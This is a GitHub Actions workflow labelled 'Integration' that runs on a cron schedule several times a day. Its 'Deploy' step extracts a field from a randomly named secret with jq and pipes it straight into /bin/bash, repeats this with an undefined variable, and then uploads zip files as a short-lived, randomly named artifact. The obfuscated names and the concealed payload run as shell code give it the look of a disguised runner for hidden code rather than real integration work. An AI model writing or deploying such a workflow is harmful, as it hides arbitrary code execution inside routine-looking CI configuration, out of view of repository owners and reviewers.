name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '36 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          vndl05: ${{ secrets.vndl05 }}
        run: |
          printf '%s' "$vndl05" | jq -r .jmfy71316 | /bin/bash
          echo $wae503 | jq -r .pw2 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: xnZIxi0T
          path: "*.zip"
          retention-days: 1
